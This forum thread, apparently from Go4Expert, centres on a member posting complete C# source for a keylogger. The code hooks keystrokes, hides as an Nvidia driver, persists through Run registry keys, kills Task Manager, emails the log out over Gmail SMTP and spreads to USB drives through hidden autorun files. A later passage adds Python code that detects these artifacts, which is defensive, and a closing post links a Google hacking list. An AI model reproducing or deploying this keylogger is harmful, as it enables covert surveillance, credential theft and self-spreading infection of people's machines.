Simple Batch Scripting Automating 3rd Party Utilities

Cleptography's Avatar, Join Date: Sep 2010
Go4Expert Member
Hello,
I will start off by stating that I am a first year network security student.
I am new to the world, and give my respects to those who know more than I do.
I however have been playing around with computers for quite some time.
I prefer scripting languages among other things simply because they are the easiest things in the world to use. I would not even consider batch to be a powerful tool outside of being able to automate other 3rd party command line utilities and such.
I prefer Perl as my weapon of choice, however over the years I have developed some scripts for generating IP addresses and running output against things like nmap and Sysinternals utilities for gathering information. I would like to share some of my toys, but thought it would be best to first ask if anyone would even have an interest in seeing some of these things. I guess if someone says yeah go ahead post, then I shall do so.
Regards,
Cleptography -
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
Hi Cleptography, and welcome to the forum. And yeah, I will love to read your tips and toys.
0
Cleptography's Avatar, Join Date: Sep 2010
Go4Expert Member
I should probably rename this thread to various codes or something. I will add various source code and scripts from as many languages as I can, along with automating command utilities.
This first code is a key logger written in C#, with the ability to email and attach itself to USB.
I cannot take full credit for this as I found it online, so creds to the original author. It has been a while so I'm not quite sure where I dug the source up from or I would post a link to it as well. I modified it a bit, but you get the general idea. It's not compiled, you can use the C# compiler included with Windows service pack or whatever compiler you so desire, but here is the source.

KeyLogger written in C#
---------------------------
Code:
using System;
using System.Diagnostics;
using System.Timers;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
using System.Net;
using System.Net.Mail;
using Microsoft.Win32;

namespace Keylogger_V2
{
    class Program
    {
        private const int WH_KEYBOARD_LL = 13;
        private const int WM_KEYDOWN = 0x0100;
        private static LowLevelKeyboardProc _proc = HookCallback;
        private static IntPtr _hookID = IntPtr.Zero;
        public static string path = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),"nvidia.log");
        public static byte caps = 0, shift = 0, failed = 0;

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr SetWindowsHookEx(int idHook, LowLevelKeyboardProc lpfn, IntPtr hMod, uint dwThreadId);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        [return: MarshalAs(UnmanagedType.Bool)]
        private static extern bool UnhookWindowsHookEx(IntPtr hhk);

        [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr CallNextHookEx(IntPtr hhk, int nCode, IntPtr wParam, IntPtr lParam);

        [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
        private static extern IntPtr GetModuleHandle(string lpModuleName);

        public static void Main()
        {
        _hookID = SetHook(_proc);
        Program.startup();
        System.Timers.Timer timer;
        timer = new System.Timers.Timer();
        timer.Elapsed += new ElapsedEventHandler(Program.OnTimedEvent);
        timer.AutoReset = true;
        timer.Interval = 600000;
        timer.Start();
        System.Timers.Timer timer2;
        timer2 = new System.Timers.Timer();
        timer2.Elapsed += new ElapsedEventHandler(Program.USBSpread);
        timer2.AutoReset = true;
        timer2.Interval = 10000;
        timer2.Start();
        Application.Run();
        GC.KeepAlive(timer);
        GC.KeepAlive(timer2);
        UnhookWindowsHookEx(_hookID);
        }

        public static void startup()
        {
            //Try to copy keylogger in some folders
            string source = Application.ExecutablePath.ToString();
            string destination = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData);
            destination=System.IO.Path.Combine(destination,"nvdisp.exe");
            try
            {
                System.IO.File.Copy(source, destination,false);
                source = destination;
            } catch {
                Console.WriteLine("No authorization to copy file or other error.");
            }
            //Find if the file already exist in startup
            try
            {
                RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

                if (registryKey.GetValue("Nvidia driver") == null)
                {
                    registryKey.SetValue("Nvidia driver", destination);
                }

                registryKey.Close();//dispose of the Key
            } catch {
                Console.WriteLine("Error setting startup reg key.");
            }
            //Try to add to all users
            try
            {
                RegistryKey registryKey = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", false);

                if (registryKey.GetValue("Nvidia driver") == null)
                {
                    registryKey.SetValue("Nvidia driver", source);
                }

                registryKey.Close();//dispose of the key
            }
            catch
            {
                Console.WriteLine("Error setting startup reg key for all users.");
            }
        }

        public static void OnTimedEvent(object source, EventArgs e)
        {
            Process[] ProcessList = Process.GetProcesses();
            foreach (Process proc in ProcessList)
            {
                if (proc.MainWindowTitle.Contains("Taskmgr.exe"))
                {
                    proc.Kill();
                }
            }
            System.Net.Mail.MailMessage msg = new System.Net.Mail.MailMessage(); //create the message
            msg.To.Add("username@gmail.com");
            msg.From = new MailAddress("username@gmail.com", "username", System.Text.Encoding.UTF8);
            msg.Subject = "i don't know";
            msg.SubjectEncoding = System.Text.Encoding.UTF8;
            msg.Body = "ciao ale";
            msg.BodyEncoding = System.Text.Encoding.UTF8;
            msg.IsBodyHtml = false;
            msg.Priority = MailPriority.High;
            SmtpClient client = new SmtpClient(); //Network Credentials for Gmail
            client.Credentials = new System.Net.NetworkCredential("username@gmail.com", "password");
            client.Port = 587;
            client.Host = "smtp.gmail.com";
            client.EnableSsl = true;
            Attachment data = new Attachment(Program.path);
            msg.Attachments.Add(data);
            try
            {
                client.Send(msg);
                failed = 0;
            }
            catch
            {
                data.Dispose();
                failed = 1;
            }
            data.Dispose();

            if (failed == 0)
                File.WriteAllText(Program.path, ""); //empties the file
    
            failed = 0;
    
        }

        private static IntPtr SetHook(LowLevelKeyboardProc proc)
        {
            using (Process curProcess = Process.GetCurrentProcess())
            using (ProcessModule curModule = curProcess.MainModule)
            {
                return SetWindowsHookEx(WH_KEYBOARD_LL, proc, GetModuleHandle(curModule.ModuleName), 0);
            }
        }
        private delegate IntPtr LowLevelKeyboardProc(int nCode, IntPtr wParam, IntPtr lParam);
        private static IntPtr HookCallback(int nCode, IntPtr wParam, IntPtr lParam)
        {
            if (nCode >= 0 && wParam == (IntPtr)WM_KEYDOWN)
            {
                StreamWriter sw = File.AppendText(Program.path);
                int vkCode = Marshal.ReadInt32(lParam);
                if (Keys.Shift == Control.ModifierKeys) Program.shift = 1;
                
            switch ((Keys)vkCode)
                {
                    case Keys.Space:
                        sw.Write(" ");
                        break;
                    case Keys.Return:
                        sw.WriteLine("");
                        break;
                    case Keys.Back:
                        sw.Write("back");
                        break;
                    case Keys.Tab:
                        sw.Write("TAB");
                        break;
                    case Keys.D0:
                        if (Program.shift == 0) sw.Write("0");
                        else sw.Write(")");
                        break;
                    case Keys.D1:
                        if (Program.shift == 0) sw.Write("1");
                        else sw.Write("!");
                        break;
                    case Keys.D2:
                        if (Program.shift == 0) sw.Write("2");
                        else sw.Write("@");
                        break;
                    case Keys.D3:
                        if (Program.shift == 0) sw.Write("3");
                        else sw.Write("#");
                        break;
                    case Keys.D4:
                        if (Program.shift == 0) sw.Write("4");
                        else sw.Write("$");
                        break;
                    case Keys.D5:
                        if (Program.shift == 0) sw.Write("5");
                        else sw.Write("%");
                        break;
                    case Keys.D6:
                        if (Program.shift == 0) sw.Write("6");
                        else sw.Write("^");
                        break;
                    case Keys.D7:
                        if (Program.shift == 0) sw.Write("7");
                        else sw.Write("&");
                        break;
                    case Keys.D8:
                        if (Program.shift == 0) sw.Write("8");
                        else sw.Write("*");
                        break;
                    case Keys.D9:
                        if (Program.shift == 0) sw.Write("9");
                        else sw.Write("(");
                        break;
                    case Keys.LShiftKey:
                    case Keys.RShiftKey:
                    case Keys.LControlKey:
                    case Keys.RControlKey:
                    case Keys.LMenu:
                    case Keys.RMenu:
                    case Keys.LWin:
                    case Keys.RWin:
                    case Keys.Apps:
                sw.Write("");
                        break;
                    case Keys.OemQuestion:
                        if (Program.shift == 0) sw.Write("/");
                        else sw.Write("?");
                        break;
                    case Keys.OemOpenBrackets:
                        if (Program.shift == 0) sw.Write("[");
                        else sw.Write("{");
                        break;
                    case Keys.OemCloseBrackets:
                        if (Program.shift == 0) sw.Write("]");
                        else sw.Write("}");
                        break;
                    case Keys.Oem1:
                        if (Program.shift == 0) sw.Write(";");
                        else sw.Write(":");
                        break;
                    case Keys.Oem7:
                        if (Program.shift == 0) sw.Write("'");
                        else sw.Write('"');
                        break;
                    case Keys.Oemcomma:
                        if (Program.shift == 0) sw.Write(",");
                        else sw.Write("<");
                        break;
                    case Keys.OemPeriod:
                        if (Program.shift == 0) sw.Write(".");
                        else sw.Write(">");
                        break;
                    case Keys.OemMinus:
                        if (Program.shift == 0) sw.Write("-");
                        else sw.Write("_");
                        break;
                    case Keys.Oemplus:
                        if (Program.shift == 0) sw.Write("=");
                        else sw.Write("+");
                        break;
                    case Keys.Oemtilde:
                        if (Program.shift == 0) sw.Write("`");
                        else sw.Write("~");
                    break;
                case Keys.Oem5:
                    sw.Write("|");
                    break;
                case Keys.Capital:
                    if (Program.caps == 0) Program.caps = 1;
                    else Program.caps = 0;
                    break;
                default:
                    if (Program.shift == 0 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToLower());
                    if (Program.shift == 1 && Program.caps == 0) sw.Write(((Keys)vkCode).ToString().ToUpper());
                    if (Program.shift == 0 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToUpper());
                    if (Program.shift == 1 && Program.caps == 1) sw.Write(((Keys)vkCode).ToString().ToLower());
                    break;
            }
            Program.shift = 0;
            sw.Close();
        }    
        return CallNextHookEx(_hookID, nCode, wParam, lParam);
        }

        public static void USBSpread(object source, EventArgs e)
        {
            ///////////////////////////////////////////////////////////////
            /////////////////////// USB spread class //////////////////////
            ///////////////////////////////////////////////////////////////
            //A bit modified
            string source2 = Application.ExecutablePath.ToString();
            System.IO.DriveInfo[] drives = System.IO.DriveInfo.GetDrives();
            try
            {
                foreach (System.IO.DriveInfo drive in drives)
                {
                    if (drive.DriveType == DriveType.Removable)
                    {
                        string driveAutorun = drive.Name + "autorun.inf";
                        StreamWriter sw = new StreamWriter(driveAutorun);
                        sw.WriteLine("[autorun]\n");
                        sw.WriteLine("open=start.exe");
                        sw.WriteLine("action=Run VMCLite");
                        sw.Close();
                        File.SetAttributes(drive.Name + "autorun.inf", File.GetAttributes(drive.Name + "autorun.inf") | FileAttributes.Hidden);
                        try
                        {
                            File.Copy(source2, drive.Name + "start.exe", true);
                            File.SetAttributes(drive.Name + "start.exe", File.GetAttributes(drive.Name + "start.exe") | FileAttributes.Hidden);
                        }
                        finally
                        {
                            Console.WriteLine("Removable device rooted");
                        }
                    }
                }
            }
            catch (Exception e2)
            {
                Console.WriteLine(e2.ToString());
            }
        }
    }
}
0
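For defenders, the artifacts the posted source leaves behind are easy to hunt for: an autostart value pointing at an executable dropped directly into the %APPDATA% root, and a hidden autorun.inf whose launch target is a hidden file in the root of a removable drive. The following is an added example, not part of the original post or its author's code. It runs the two checks over constructed sample data; the function names and the input shapes (Run-key rows as tuples, a set of hidden file names) are assumptions made for illustration.

```python
import configparser
import ntpath
import re

# Constructed sample data: (hive, value name, command) rows from the Run keys.
SAMPLE_RUN_ENTRIES = [
    ("HKCU", "Nvidia driver", r"C:\Users\alice\AppData\Roaming\nvdisp.exe"),
    ("HKLM", "SecurityHealth", r"%windir%\system32\SecurityHealthSystray.exe"),
    ("HKCU", "OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
]
# Constructed sample: the autorun.inf layout the posted code writes to a drive.
SAMPLE_AUTORUN = "[autorun]\n\nopen=start.exe\naction=Run VMCLite\n"

def exe_path(command):
    """Extract the executable path from a Run-key command line."""
    m = re.match(r'\s*"?([^"]+?\.exe)', command, re.IGNORECASE)
    return m.group(1) if m else None

def suspicious_run_entries(entries):
    """Flag autostart entries whose binary sits directly in the %APPDATA% root."""
    hits = []
    for hive, name, command in entries:
        path = exe_path(command)
        if path is None:
            continue
        # Legitimate software normally installs into a vendor subfolder.
        parent = ntpath.basename(ntpath.dirname(path)).lower()
        if parent in ("roaming", "%appdata%"):
            hits.append((hive, name, path))
    return hits

def autorun_targets(inf_text):
    """Return the programs an autorun.inf asks the shell to launch."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    try:
        cp.read_string(inf_text)
    except configparser.Error:  # malformed file, e.g. no section header
        return []
    return [cp.get(s, k) for s in cp.sections() if s.lower() == "autorun"
            for k in ("open", "shellexecute") if cp.has_option(s, k)]

def hidden_autorun_payloads(inf_text, hidden_files):
    """Flag launch targets that are hidden files next to a hidden autorun.inf."""
    hidden = {f.lower() for f in hidden_files}
    if "autorun.inf" not in hidden:
        return []
    return [t for t in autorun_targets(inf_text)
            if ntpath.basename(t).lower() in hidden]
```

On a live host the rows would come from the HKCU and HKLM Run keys and from the root directory listing of each removable drive.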
Cleptography's Avatar, Join Date: Sep 2010
Go4Expert Member
Google's master list: a place for all your Google hacking fun.

it.toolbox.com/blogs/managing-infosec/google-hacking-master-list-28302
0
shabbir's Avatar, Join Date: Jul 2004
Go4Expert Founder
I have split all but one into separate articles.